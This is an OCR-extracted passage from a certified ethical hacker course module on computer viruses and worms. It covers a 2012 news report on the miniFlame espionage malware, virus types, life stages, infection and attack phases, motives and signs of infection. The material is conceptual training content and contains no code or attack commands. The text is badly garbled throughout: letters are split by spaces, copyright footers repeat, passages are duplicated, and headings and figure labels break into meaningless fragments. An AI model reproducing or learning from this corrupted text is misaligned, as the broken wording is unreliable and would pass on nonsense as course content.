CEHv8 Module 07 Viruses and Worms

Viruses and Worms
Module 07
Ethical Hacking a n d C o u n te rm e a s u re s V iru ses a n d W o rm s
Exam 3 1 2 -5 0 C ertified Ethical H acker
V iru s e s and W orm s

M o d u le 07
Engineered by Hackers. Presented by Professionals.
E th ic a l H a c k in g
a n d
C o u n te rm e a s u re s v 8
M o d u le 0 7 : V iru s e s a n d W o r m s E xam 3 1 2 -5 0
M o d u le 0 7 P ag e 1007
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0linCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
S ecurity N ew s
I G lo b a lR e s e a rc h
CEH
H om e
P r o d u c ts
A bout
5 rv *c c s
O c to b e r 1 9 ,2 0 1 2
G lo b a l C y b e r-W a rfa re M a lw a re u s e d
T a c tic s : N ew
F la m e -lin k e d
in C y b e r - E s p i o n a g e
A n e w c y b e r e s p io n a g e p ro g ra m linked to th e n o to r io u s F lam e a n d G au ss m a lw a re h a s b e e n d e t e c te d by R ussia's K aspersky Lab. T he an ti-v iru s g ia n t's c h ief w a rn s t h a t global cy b e r w a r f a r e is in "full sw in g " a n d will p ro b a b ly e s c a la te in 2013. T h e virus, d u b b e d m in iF lam e, a n d a lso kn o w n a s SPE, h as a lr e a d y in fe c te d c o m p u te r s in Iran , L e b an o n , France, t h e U n ite d S ta te s a n d L ith u an ia. It w as d isco v e red in July 2 0 1 2 a n d is d e s c rib e d a s o n its w e b s ite . T he m a lw a re w a s originally id e n tified a s a n a p p e n d a g e of F lam e - th e p ro g ra m u se d fo r ta r g e te d cy b e r e s p io n a g e in th e M iddle E a st a n d a c k n o w le d g e d to b e p a rt o f jo in t U S-lsraeli e f f o r ts to u n d e rm in e Iran 's n u c le a r p ro g ram . B ut later, K aspersky Lab a n a ly s ts d is c o v e re d t h a t m in iF lam e is a n " in t e r o p e r a b l e t o o l t h a t c o u l d b e u s e d a s a n in d e p e n d e n t
m a lic io u s p r o g r a m , o r c o n c u r r e n t ly a s a p l u g - i n f o r b o t h t h e F la m e a n d G a u s s m a lw a r e . "
"a small and highlyflexible malicious program designed to steal data and control infected systems during targeted cyber espionage operations," K aspersky Lab said in a s ta te m e n t p o s te d
^ ^ ^ ^ T h e a n a l y s i s a lso s h o w e d n e w e v id e n c e o f c o o p e ra tio n b e tw e e n th e c r e a to r s o f F lam e a n d G a u s s ^ ^ ^ ^ ^
h t t p ://w w w . g lo b a /re s e a rc h , ca
C o p y rig h t b y EC -C auactl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
S e c u r ity an M M
N e w s F la m e - lin k e d
G lo b a l C y b e r - W a r fa r e T a c tic s : N e w M a lw a re u s e d in C y b e r-E s p io n a g e
S o u rc e : h t t p : / / w w w . g l o b a l r e s e a r c h . c a A n e w c y b e r e s p io n a g e p r o g r a m lin k e d t o t h e n o t o r i o u s F la m e a n d G auss m a l w a r e has b e e n d e t e c t e d b y Russia's K a s p e rsky Lab. T h e a n t i v i r u s g ia n t 's c h ie f w a r n s t h a t g lo b a l c y b e r w a r f a r e is in " f u l l s w i n g " a n d p r o b a b l y e s c a la te in 2 0 1 3 . T h e v iru s , d u b b e d m in iF la m e , a nd also k n o w n as SPE, has a lr e a d y i n f e c t e d c o m p u t e r s in Iran, L e b a n o n , F rance, t h e U n ite d States, a n d L ith u a n ia . It w a s d is c o v e r e d in July 2 0 1 2 a n d is
d e s c r ib e d as "a s m a ll a n d h ig h ly f le x ib le m a lic io u s p r o g r a m d e s ig n e d t o ste a l d a ta a n d c o n t r o l in fe c te d s y s te m s d u r in g ta rg e te d cyber e s p io n a g e o p e ra tio n s ," K a sp e rsky Lab said in a
s t a t e m e n t p o s te d o n its w e b s i t e . The m a lw a re w a s o r i g i n a l l y i d e n t if ie d as an a p p e n d a g e o f F lam e, t h e p ro g ra m u sed f o r
t a r g e t e d c y b e r e s p io n a g e in t h e M i d d l e East a n d a c k n o w l e d g e d t o be p a r t o f j o i n t US-lsraeli e f f o r t s t o u n d e r m i n e Ira n 's n u c l e a r p r o g r a m .
M o d u le 0 7 P ag e 1008
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0UnCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
B u t la t e r , K a sp e rsky Lab a n a ly s ts d is c o v e r e d t h a t m i n i F l a m e is an " i n t e r o p e r a b l e t o o l t h a t c o u ld be used as an i n d e p e n d e n t m a lic io u s p r o g r a m , o r c o n c u r r e n t l y as a p lu g - in f o r b o t h t h e Flam e a n d Gauss m a l w a r e . " T h e a na lysis also s h o w e d n e w e v id e n c e o f c o o p e r a t i o n b e t w e e n t h e c r e a t o r s o f F la m e a nd Gauss, as b o t h v iru s e s can use m in i F la m e f o r t h e i r o p e r a t i o n s . " M i n i F l a m e ' s a b i l it y t o be used as a p lu g - in b y e i t h e r F lam e o r Gauss c le a r ly c o n n e c ts t h e c o ll a b o r a t i o n b e t w e e n t h e d e v e l o p m e n t t e a m s o f b o t h F la m e a n d Gauss. Since t h e c o n n e c t i o n b e t w e e n F la m e a n d S t u x n e t / D u q u has a lr e a d y b e e n r e v e a le d , it can be c o n c l u d e d t h a t all th e s e a d v a n c e d t h r e a t s c o m e f r o m t h e s a m e 'c y b e r w a r f a r e ' f a c t o r y , " K a s p e r s k y Lab said. H ig h - p r e c is io n a tta c k to o l So f a r j u s t 5 0 t o 6 0 cases o f in f e c t i o n h a v e b e e n d e t e c t e d w o r l d w i d e , a c c o r d in g t o K a sp e rs ky Lab. B u t u n lik e F lam e a n d Gauss, m in iF la m e in m e a n t f o r in s t a l l a t i o n o n m a c h in e s a lr e a d y i n f e c t e d b y t h o s e v iru se s . " M i n i F l a m e is a h ig h - p r e c is io n a t t a c k t o o l . M o s t lik e ly it is a t a r g e t e d c y b e r w e a p o n used in w h a t can be d e f i n e d as t h e s e c o n d w a v e o f a c y b e r a t t a c k , " K a s p e rsk y's C h ie f S e c u r ity E x p e rt A l e x a n d e r G o s te v e x p la in e d . "F ir s t, F la m e o r Gauss a re used t o in f e c t as m a n y v i c t i m s as p o s s ib le t o c o lle c t la rg e q u a n t i t i e s o f i n f o r m a t i o n . A f t e r d a ta is c o lle c te d a n d r e v i e w e d , a p o t e n t i a l l y i n t e r e s t i n g v i c t i m is d e f i n e d a n d i d e n t if ie d , a n d m in iF la m e is in s t a lle d in o r d e r t o c o n d u c t m o r e in - d e p t h s u r v e il l a n c e a nd c y b e r-e s p io n a g e ." T h e n e w l y - d i s c o v e r e d m a l w a r e can also t a k e s c r e e n s h o t s o f an i n f e c t e d c o m p u t e r w h i l e it is r u n n i n g a s p e c ific p r o g r a m o r a p p li c a t i o n in such as a w e b b r o w s e r , M i c r o s o f t O ffic e p r o g r a m , A d o b e R eader, i n s t a n t m e s s e n g e r se rv ic e o r FTP c lie n t. K a sp e rsky Lab b e lie v e s m in i F la m e 's d e v e lo p e r s h a v e p r o b a b l y c r e a te d d o z e n s o f d i f f e r e n t m o d i f i c a t i o n s o f t h e p r o g r a m . " A t t h i s t i m e , w e h a v e o n l y f o u n d six o f th e s e , d a t e d 2 0 1 0 - 2 0 1 1 , " t h e f i r m said. C y b e r w a rfa re in fu ll s w in g
M e a n w h i l e , K a s p e rs k y Lab's c o - f o u n d e r a n d CEO E u ge n e K a s p e rs k y w a r n e d t h a t g lo b a l c y b e r w a r f a r e ta c tic s a re b e c o m i n g m o r e s o p h is t ic a t e d w h i l e also b e c o m i n g m o r e t h r e a t e n i n g . He u rg e d g o v e r n m e n t s t o w o r k t o g e t h e r t o f i g h t c y b e r w a r f a r e a n d c y b e r - t e r r o r i s m , X in h u a n e w s a g e n c y r e p o r ts . S p e a k in g a t an I n t e r n a t i o n a l T e l e c o m m u n i c a t i o n U n io n T e le c o m W o r l d c o n f e r e n c e in D u b a i, t h e a n t i v i r u s t y c o o n said, " c y b e r w a r f a r e is in fu ll s w in g a nd w e e x p e c t it t o e s c a la te in 2 0 1 3 ." " T h e la t e s t m a lic io u s v ir u s a t t a c k o n t h e w o r l d ' s la r g e s t o il a n d gas c o m p a n y , Saudi A r a m c o , last A u g u s t s h o w s h o w d e p e n d e n t w e a re t o d a y o n t h e I n t e r n e t a nd i n f o r m a t i o n t e c h n o l o g y in g e n e r a l, a n d h o w v u ln e r a b l e w e a r e ," K a sp e rs ky said. He s t o p p e d s h o r t o f b la m i n g a n y p a r t i c u l a r p la y e r b e h in d t h e m a s s iv e c y b e r - a t t a c k s across t h e M i d d l e East, p o i n t i n g o u t t h a t " o u r j o b is n o t t o i d e n t i t y h a c k e rs o r c y b e r - t e r r o r i s t s . O u r f i r m is
M o d u le 0 7 P ag e 1009
like an X -ra y m a c h in e , m e a n i n g w e can scan a n d i d e n t i f y a p r o b l e m , b u t w e c a n n o t say w h o o r w h a t is b e h in d i t . " Iran, w h o c o n f i r m e d t h a t it s u f f e r e d an a t t a c k b y F la m e m a l w a r e t h a t ca u s e d s e v e re d a ta loss, b la m e s t h e U n i t e d S ta te s a nd Israel f o r u n l e a s h i n g t h e c y b e r - a tta c k s .
C opyright 2 0 0 5 -2 0 1 2G lo b a lR e se a rch .ca
By Russia Today
h ttp ://w w w .g lo b a lre s e a rc h .c a /g lo b a l-c v b e r-w a rfa re -ta c tic s -n e w -fla m e -lin k e d -m a lw a re -u s e d -in c y b e r-e s p io n a g e /5 3 0 8 8 6 7
M o d u le 0 7 P ag e 1010
M o d u le O b je c tiv e s
J J J J J I n t r o d u c tio n to V iru s e s S tages o f V iru s Life W o r k in g o f V iru s e s In d ic a tio n s o f V iru s A tta c k H o w d o e s a C o m p u te r G e t In fe c te d b y V iru s e s y J J V iru s A n a ly s is T y p e s o f V iru s e s V iru s M a k e r J J J J J J J J C o m p u te r W o rm s W o r m A n a ly s is W o rm M a k e r M a lw a r e A n a ly s is P ro c e d u re
CEH
O n lin e M a lw a r e A n a ly s is S e rvice s V iru s a n d W o rm s C o u n te rm e a s u re s A n tiv ir u s T o o ls P e n e tra tio n T e s tin g f o r V iru s
M o d u le
O b je c tiv e s
T h e o b j e c t iv e o f th is m o d u l e is t o e x p o s e y o u t o t h e v a r io u s v iru s e s a n d w o r m s a v a ila b le to d a y . It g ive s y o u i n f o r m a t i o n a b o u t all t h e a v a ila b le v iru s e s a n d w o r m s . This m o d u l e e x a m in e s t h e w o r k i n g s o f a c o m p u t e r v iru s , its f u n c t i o n , c la s s ific a tio n , a n d t h e m a n n e r in w h i c h it a ffe c ts s y s te m s . T his m o d u l e w ill go i n t o d e ta il a b o u t t h e v a r io u s c o u n t e r m e a s u r e s a v a ila b le t o p r o t e c t a g a in s t th e s e v ir u s i n f e c tio n s . T h e m a in o b j e c t iv e o f th is m o d u l e is t o e d u c a t e y o u a b o u t t h e a v a ila b le v iru s e s a nd w o r m s , i n d i c a t i o n s o f t h e i r a t t a c k a nd t h e w a y s t o p r o t e c t a g a in s t v a r io u s v iru s e s , a n d t e s t i n g y o u r s y s te m o r n e t w o r k a g a in s t v iru s e s o r w o r m s p re s e n c e . T his m o d u l e w i ll f a m i l i a r i z e y o u w i t h : 0 0 0 0 0 I n t r o d u c t i o n t o V iru s e s Stages o f V ir u s Life W o r k i n g o f V iru s e s I n d ic a tio n s o f V ir u s A t t a c k How D oes a C o m p u te r Get In f e c t e d by 0 0 0 0 0 0 C o m p u te r W o rm s W o r m A n a ly s is W o rm M aker M a l w a r e A n a ly s is P r o c e d u r e O n lin e M a l w a r e A n a ly s is Services V ir u s a nd W o r m s C o u n te rm e a su re s 0 A n t i v i r u s T o o ls
V iru se s? 0 0 Modute07 V ir u s A n a ly s is T y p e s o f V iru s e s !M a k e r
Ethical H a ck if^ a n J P ( f i W ^ t F ^ J i a W e T e M m g t f 0 P yV t f l t t 1 n c i l All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
M o d u le F lo w
V iru s
a n d T y p e s o f V iru s e s
W o rm s C o n c e p ts
P e n e tra tio n T e s tin g
C o m p u te r W o rm s
C o u n te rm e a s u re s
M a lw a re A n a ly s is
C o p y rig h t b y R - C m B C I . A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
M o d u le
F lo w
T his s e c tio n in t r o d u c e s y o u t o v a r io u s v iru s e s a n d w o r m s a v a ila b le t o d a y a n d g ive s y o u a b r i e f o v e r v i e w o f e a ch v ir u s a n d s t a t i s t i c s o f v iru s e s a n d w o r m s in t h e r e c e n t y e a rs. It lists v a r io u s t y p e s o f v iru s e s a nd t h e i r e f fe c ts o n y o u r s y s te m . T h e w o r k i n g o f v iru s e s in e a c h p h a s e has w i ll be d iscu sse d in d e ta il. T h e t e c h n i q u e s used b y t h e a t t a c k e r t o d i s t r i b u t e m a l w a r e o n t h e w e b a re h ig h lig h t e d .
V ir u s a n d W o r m s C o n c e p t
M a l w a r e A n a ly s is
T y p e s o f V ir u s e s
f|j|| C o u n t e r m e a s u r e s
^ P e n e t r a t i o n T e s t in g
/
V
M o d u le 0 7 P ag e 1012
In tro d u c tio n to V iru s e s

_l A v iru s is a s e lf- r e p lic a tin g p r o g r a m t h a t p r o d u c e s its o w n c o p y b y a tta c h in g its e lf to a n o th e r p r o g r a m , c o m p u te r b o o t s e c to r o r d o c u m e n t J V iru s e s a re g e n e ra lly tr a n s m itte d th r o u g h file d o w n lo a d s , in fe c te d d is k /fla s h d riv e s a n d as e m a il a tt a c h m e n ts
CEH
V ir u s
C h a r a c te r i s t ic s
Infects Other Program
Alters Data %
V
Transforms Itself
Corrupts Files and Programs
% #
F*
Encrypts Itself
Self Propagates
1 f 1
I n t r o d u c t i o n
to
V ir u s e s
C o m p u t e r v i r u s e s h a v e t h e p o t e n t i a l t o w r e a k h a v o c o n b o t h b u sin e ss a n d p e r s o n a l c o m p u t e r s . W o r l d w i d e , m o s t b u sin e sse s h a ve b e e n i n f e c t e d a t s o m e p o i n t . A v ir u s is a se lfr e p li c a t i n g p r o g r a m t h a t p r o d u c e s its o w n c o d e b y a t t a c h i n g c o p ie s o f it i n t o o t h e r e x e c u ta b le c o d e s. T his v ir u s o p e r a t e s w i t h o u t t h e k n o w l e d g e o r d e s ire o f t h e user. Like a real v iru s , a c o m p u t e r v ir u s is c o n t a g i o u s a n d can c o n t a m i n a t e o t h e r file s. H o w e v e r , v iru s e s can i n f e c t o u t s i d e m a c h in e s o n l y w i t h t h e a ss ista n ce o f c o m p u t e r users. S o m e v iru s e s a f f e c t c o m p u t e r s as soon as t h e i r c o d e is e x e c u t e d ; o t h e r v iru s e s lie d o r m a n t u n t i l a p r e - d e t e r m i n e d logical
c i r c u m s t a n c e is m e t . T h e r e a re t h r e e c a te g o r ie s o f m a lic io u s p r o g r a m s : 0 0 0 T r o ja n s a n d r o o t k i t s V iru s e s W o rm s
A w o r m is a m a lic io u s p r o g r a m t h a t can in f e c t b o t h local a n d r e m o t e m a c h in e s . W o r m s s p re a d a u t o m a t i c a l l y b y in f e c t i n g s y s te m a f t e r s y s te m in a n e t w o r k , a n d e v e n s p r e a d in g f u r t h e r t o o t h e r n e t w o r k s . T h e r e f o r e , w o r m s h a ve a g r e a t e r p o t e n t i a l f o r c a u s in g d a m a g e b e c a u s e t h e y d o n o t r e ly o n t h e u s e r's a c tio n s f o r e x e c u t i o n . T h e r e a re also m a l i c i o u s p r o g r a m s in t h e w i ld t h a t c o n t a i n all o f t h e f e a t u r e s o f th e s e t h r e e m a lic io u s p r o g r a m s .
M o d u le 0 7 P ag e 1013
i r u s
a n d
o r m
t a t i s t i c s
7 5 ,0 0 0 ,0 0 0
6 0 ,0 0 0 ,0 0 0
4 5 ,0 0 0 ,0 0 0
3 0 ,0 0 0 ,0 0 0
1 5 ,0 0 0 ,0 0 0
2008
2010
2011
2012
h t t p : / / w w w . a v t e s t . o r g
C o p y rig h t b y E & C t in c t l. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
V ir u s
a n d
o r m
S ta tis tic s
S o u rc e : h t t p : / / w w w . a v - t e s t . o r g T his g ra p h ic a l r e p r e s e n t a t i o n g ive s d e t a i le d i n f o r m a t i o n o f t h e a t t a c k s t h a t h a v e o c c u r r e d in t h e r e c e n t y e a rs. A c c o r d i n g t o t h e g r a p h , o n l y 1 1 ,6 6 6 , 6 6 7 s y s te m s w e r e a f f e c t e d b y v iru s e s a nd w orm s in t h e year 2008, w he re a s in t h e ye ar 2012, th e c o u n t d ra s tic a lly in c r e a s e d to 7 0 ,0 0 0 ,0 0 0 s y s te m s , w h i c h m e a n s t h a t t h e g r o w t h o f m a l w a r e a tta c k s o n s y s te m s is in c r e a s in g e x p o n e n t ia l ly y e a r b y ye a r.
M o d u le 0 7 P ag e 1014
7 5 .0 0 0 .0 0 0
6 0 .0 0 0 .0 0 0
4 5 .0 0 0 .0 0 0
3 0 .0 0 0 .0 0 0
1 5 .0 0 0 .0 0 0
0
2008 2009 2010 2011 2012
FIGURE 7 .1 : V iru s a n d W o rm S ta tis tic s
M o d u le 0 7 P ag e 1015
Ethical H acking a n d C o u n te rm e a s u re s C opyright by EC-C0l1nCil All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
D e s ig n Developing virus code using program m ing languages or co n stru c tio n kits
R e p lic a tio n Virus replicates for a p eriod o f tim e w ithin th e ta rg e t sy stem a n d th e n s p read s itself
L aunch It g ets activ ated w ith th e u ser perform ing certain actio n s such as running an infected pro g ram
E lim in a tio n U sers install a n tiv iru s u p d a te s a n d e lim in a te th e virus th r e a ts
In c o rp o ra tio n A ntivirus s o f tw a r e d e v e lo p e rs a ss im ila te d e fe n s e s a g a in s t th e virus
D e te c tio n A virus is id e n tified a s th r e a t in fectin g ta r g e t s y ste m s
S ta g e s
o f V ir u s
L ife
C o m p u t e r v ir u s a tta c k s s p re a d t h r o u g h v a r io u s sta ge s f r o m i n c e p t io n t o d e s ig n t o e lim in a tio n . 1. D e s ig n : A v ir u s c o d e is d e v e lo p e d by u s in g p r o g r a m m i n g la n g u a g e s o r c o n s t r u c t i o n kits. A n y o n e w i t h basic p r o g r a m m i n g k n o w l e d g e can c r e a te a viru s . 2. R e p l ic a t i o n : A v ir u s f i r s t r e p lic a te s it s e lf w i t h i n a t a r g e t s y s te m o v e r a p e r io d o f t i m e . 3. Launch: It is a c t i v a t e d w h e n a u s e r p e r f o r m s c e r t a i n a c tio n s such as t r i g g e r i n g o r r u n n i n g an in fe c te d p ro g ra m . 4. D e te c tio n : A v ir u s is i d e n t if ie d as a t h r e a t i n f e c t i n g t a r g e t s y s te m s . Its a c tio n s ca use c o n s id e r a b le d a m a g e t o t h e t a r g e t s y s te m 's d a ta .
M o d u le 0 7 P ag e 1016
5.
In c o rp o ra tio n : A n t i v i r u s s o f t w a r e d e v e l o p e r s a s s e m b l e d e f e n s e s a g a in s t t h e viru s .
6.
E lim in a tio n : Users a re a d v is e d t o in s ta ll a n t i v i r u s s o f t w a r e u p d a te s , t h u s c r e a t i n g a w a r e n e s s a m o n g user g ro up s
M o d u le 0 7 P ag e 1017
Exam 3 1 2-50 C ertified Ethical H acker
o r k in g
o f
V ir u s e s :
I n f e c t i o n
P h a s e
Infection Phase
In th e in fe c tio n p h a s e , th e v iru s r e p lic a te s its e lf a n d a tta c h e s to a n .exe file in th e s y s te m
B e fo re
In fe c tio n
A fte r In fe c tio n
*
C le an File V irus In fe c te d File
o r k in g a tta c k
o f V ir u s e s : a ta rg e t h o s t's
In fe c tio n s y s te m by
P h a s e u sin g v a r io u s m e th o d s . They a tta c h
V ir u s e s
t h e m s e l v e s t o p r o g r a m s a n d t r a n s m i t t h e m s e l v e s t o o t h e r p r o g r a m s by m a k in g use o f c e r ta in e v e n ts . V iru s e s n e e d such e v e n ts t o ta k e p la ce sin ce t h e y c a n n o t: S e lf s t a r t In f e c t o t h e r h a r d w a r e Cause p h y s ic a l d a m a g e t o a c o m p u t e r T r a n s m i t t h e m s e l v e s u sin g n o n - e x e c u t a b l e file s
G e n e r a lly v iru s e s h a ve t w o phases, t h e i n f e c t i o n p h a s e a n d t h e a t t a c k p h a s e . In t h e i n f e c t i o n p ha se, t h e v i r u s r e p li c a t e s i t s e lf a n d a t t a c h e s t o an .e xe f ile in t h e s y s te m . P r o g r a m s m o d i f i e d by a v ir u s i n f e c t i o n can e n a b le v ir u s f u n c t i o n a l i t i e s t o ru n o n t h a t s y s te m . V iru s e s g e t e n a b le d as s o o n as t h e i n f e c t e d p r o g r a m is e x e c u te d , since t h e p r o g r a m c o d e leads t o t h e v ir u s c o d e . V ir u s w r i t e r s h a v e t o m a i n t a i n a b a la n c e a m o n g f a c t o r s such as: H o w w i ll t h e v ir u s in f e c t? H o w w i ll it s p re a d ? H o w w i ll it re s id e in a t a r g e t c o m p u t e r ' s m e m o r y w i t h o u t b e in g d e t e c t e d ?
M o d u le
07
P ag e 1 0 1 8
Ethical H acking a n d C o u n te rm e a s u re s C opyright by E C - C 0 U n C il All Rights R eserved. R ep ro d u ctio n is Strictly P ro h ib ite d .
O b v io u s ly , v iru s e s h a v e t o b e t r i g g e r e d a n d e x e c u t e d in o r d e r t o f u n c t i o n . T h e r e a re m a n y w a y s t o e x e c u te p r o g r a m s w h i l e a c o m p u t e r is r u n n in g . For e x a m p le , a n y s e tu p p r o g r a m calls f o r n u m e r o u s p r o g r a m s t h a t m a y be b u i l t i n t o a s y s te m , a n d s o m e o f th e s e a re d i s t r i b u t i o n m e d i u m p r o g r a m s . T hu s, if a v ir u s p r o g r a m a lr e a d y exists, it can be a c tiv a te d w i t h t h is k in d o f e x e c u t i o n a n d in f e c t t h e a d d it io n a l s e t u p p r o g r a m as w e ll. T h e r e a re v ir u s p r o g r a m s t h a t in f e c t a n d k e e p s p r e a d in g e v e r y t i m e t h e y a re e x e c u te d . Some
p r o g r a m s d o n o t in f e c t t h e p r o g r a m s w h e n f i r s t e x e c u te d . T h e y re s id e in a c o m p u t e r ' s m e m o r y a n d in f e c t p r o g r a m s a t a l a t e r t i m e . Such v ir u s p r o g r a m s as TSR w a i t f o r a s p e c ifie d t r i g g e r e v e n t t o s p re a d a t a l a t e r s ta ge . It is, t h e r e f o r e , d i f f i c u l t t o r e c o g n iz e w h i c h e v e n t m i g h t t r i g g e r t h e e x e c u t i o n o f a d o r m a n t v ir u s i n f e c t i o n . R e fe r t o t h e f i g u r e t h a t f o l l o w s t o see h o w t h e EXE file i n f e c t i o n w o r k s . In t h e f o l l o w i n g f ig u r e , t h e .EXE file 's h e a d e r , w h e n t r i g g e r e d , e x e c u te s a n d s ta r t s r u n n i n g t h e a p p li c a t i o n . O n c e t h is file is i n f e c t e d , a n y t r i g g e r e v e n t f r o m t h e file 's h e a d e r can a c t i v a t e t h e v ir u s c o d e t o o , a lo n g w i t h t h e a p p li c a t i o n p r o g r a m as s o o n as it is ru n . Q A f ile v ir u s i n f e c ts b y a t t a c h i n g its e lf t o an e x e c u t a b l e s y s te m a p p li c a t i o n p r o g r a m . T e x t file s su ch as s o u r c e c o d e , b a tc h file s, s c r ip t files, e tc., a re c o n s id e r e d p o t e n t i a l t a r g e t s f o r v iru s in f e c tio n s . B o o t s e c t o r v iru s e s e x e c u te t h e i r o w n c o d e in t h e f i r s t p la ce b e f o r e t h e t a r g e t PC is b o o te d
B e fo re In fe c tio n A fte r In fe c tio n
.exe
_u
C le a n F ile V ir u s I n f e c t e d F ile
FIGURE 7 .2 : W o rk in g o f V iru s e s in In fe c tio n Phase
M o d u le 0 7 P ag e 1019
W D U
^
o r k in g
o q p
^
o f
V ir u s e s :
A t t a c k
r
U rtfW<
cu
ttkxjl Nm Im
V t
11
J J
V iru s e s a re p r o g r a m m e d w ith tr ig g e r e v e n ts t o a c tiv a te a n d c o r r u p t s y s te m s S o m e v iru s e s in fe c t e a c h tim e th e y a re r u n a n d o th e r s in fe c t o n ly w h e n a c e r ta in p r e d e fin e d c o n d itio n is m e t s u c h as a u s e r's s p e c ific t a s k , a day, tim e , o r a p a r tic u la r e v e n t
U n fra g m e n te d
F ile B e f o r e A tta c k 11
File: A 1
Page: 1 P a g e :2
File: B
P a g e :2
1
P a g e :3
___________________ 1 P a g e :3
P age: 1
F ile F r a g m e n te d
D u e to
V iru s A tta c k
Page: 1 F ile : A
P a g e :3 F ile : B
P age: 1 F ile : B
P a g e :3 F ile : A
P a g e :2 F ile : B
P a g e :2 F ile : A
C o p y rig h t b y E & C a u a c tl. A ll R ig h ts R e se rve d . R e p ro d u c tio n is S tr ic tly P ro h ib ite d .
o r k in g
o f V ir u s e s : A tta c k
P h a s e
O n c e v iru s e s s p re a d t h e m s e lv e s t h r o u g h o u t t h e t a r g e t s y s te m , t h e y s t a r t c o r r u p t i n g t h e file s a n d p r o g r a m s o f t h e h o s t s y s te m . S o m e v iru s e s h a v e t r i g g e r e v e n ts t h a t n e e d t o be a c t iv a t e d t o c o r r u p t t h e h o s t s y s te m . S o m e v ir u s e s h a v e bugs t h a t r e p lic a t e th e m s e lv e s , a nd p e r f o r m a c tiv it ie s such as d e l e t i n g f ile s a n d in c r e a s in g s e s s io n t i m e . T h e y c o r r u p t t h e i r t a r g e t s o n ly a f t e r s p re a d in g as i n t e n d e d b y t h e i r d e v e lo p e r s . M o s t v iru s e s t h a t a t t a c k t a r g e t s y s te m s p e r f o r m a c tio n s such as: Q D e le tin g file s a n d a l t e r i n g c o n t e n t in d a ta files, t h e r e b y c a u s in g t h e s y s te m t o s lo w down
P e r f o r m in g ta sks a n im a t io n s
not
r e la t e d
to
a p p lic a tio n s ,
such
as p la y in g
m u s ic
and
c r e a tin g
M o d u le 0 7 P ag e 1020
U n fra g m e n te d
F ile
B e fo re
A tta c k
File: A
P age: 1 P age: 2 P age: 3 P age: 1
File: B
P age: 2 P age: 3
F ile
F ra g m e n te d
D u e to
V iru s A tta c k
P age: 1 F ile: A
P age: 3 F ile : B
P age: 1 F ile: B
P age: 3 F ile : A
P age: 2 F ile : B
P age: 2 F ile : A
A
FIGURE 7 .3 : W o rk in g o f V iru s e s in A tta c k Phase
R e fe r t o t h is f i g u r e , w h i c h has t w o file s, A a n d B. In s e c tio n o n e , t h e t w o file s a re l o c a te d o n e a f t e r t h e o t h e r in an o r d e r l y f a s h io n . O n c e a v ir u s c o d e i n f e c ts t h e file , it a lte r s t h e p o s i t i o n i n g o f t h e file s t h a t w e r e c o n s e c u t i v e l y p la c e d , t h u s l e a d in g t o in a c c u r a c y in f ile a llo c a tio n s , c a u s in g t h e s y s te m t o s l o w d o w n as users t r y t o r e t r i e v e t h e i r file s. In t h i s p ha se: 0 Q V iru s e s e x e c u te w h e n s o m e e v e n ts a re t r i g g e r e d S o m e e x e c u te a n d c o r r u p t via b u i l t - i n b u g p r o g r a m s a f t e r b e in g s t o r e d in t h e h o s t's m em ory
M o s t v iru s e s a re w r i t t e n t o c o n c e a l t h e i r p re s e n c e , a t t a c k in g o n l y a f t e r s p r e a d in g in t h e h o s t t o t h e f u l le s t e x t e n t
M o d u le 0 7 P ag e 1021
h y
D o
P e o p le
C r e a t e
C o m
p u t e r
r
UrtifWd
c | ttkiul
u
Km Im
V ir u s e s
o m
p u t e r V ir u s e s
I n f lic t d a m a g e t o c o m p e tito r s
F in a n c ia l b e n e fits
R e s e a rc h p r o je c ts
P la y p r a n k
J J J
V a n d a lis m
C y b e r te r r o r is m
D is tr ib u te p o litic a l m e ssa g e s
V u ln e r a b le S y s te m
W h y
D o
P e o p le
C re a te
C o m p u te r V ir u s e s ?
S o u rc e : h t t p : / / w w w . s e c u r i t y d o c s . c o m C o m p u t e r v iru s e s a re n o t s e lf - g e n e r a t e d , b u t a re c r e a te d b y c y b e r - c r i m i n a l m in d s , i n t e n t i o n a l l y d e s ig n e d t o ca use d e s t r u c t i v e o c c u r r e n c e s in a s y s te m . G e n e ra lly , v iru s e s a re c r e a te d w i t h a d is r e p u t a b l e m o t i v e . C y b e r - c r im i n a l s c r e a te v iru s e s t o d e s t r o y a c o m p a n y 's d a ta , as an a c t o f v a n d a lis m o r a p ra n k , o r t o d e s t r o y a c o m p a n y 's p r o d u c ts . H o w e v e r , in s o m e cases, v iru s e s are a c t u a lly in te n d e d to be g o o d fo r a s y s te m . T he se a re d e s ig n e d to im p ro v e a s y s te m 's
p e r f o r m a n c e b y d e l e t in g p r e v io u s ly e m b e d d e d v iru s e s f r o m files. S o m e r e a s o n s v iru s e s h a v e b e e n w r i t t e n in c lu d e : e 0 0 0 0 I n flic t d a m a g e t o c o m p e t i t o r s R esearch p r o je c ts Pranks V a n d a lis m A t t a c k t h e p r o d u c t s o f s p e c ific c o m p a n i e s D is t r i b u t e p o litic a l m essa ge s F ina ncia l g ain
M o d u le 0 7 P ag e 1022
Q Q Q
Id e n tity th e ft S pyw are C r y p t o v ir a l e x t o r t i o n
M o d u le 0 7 P ag e 1023
P ro c e s s e s ta k e m o r e re s o u rc e s a n d tim e
C o m p u te r slo w s dow n w hen p ro g r a m s s ta r t
C o m p u te r fre e z e s fr e q u e n tly o r e n c o u n te r s e rro r
In d ic a tio n s
o f V ir u s
A tta c k s
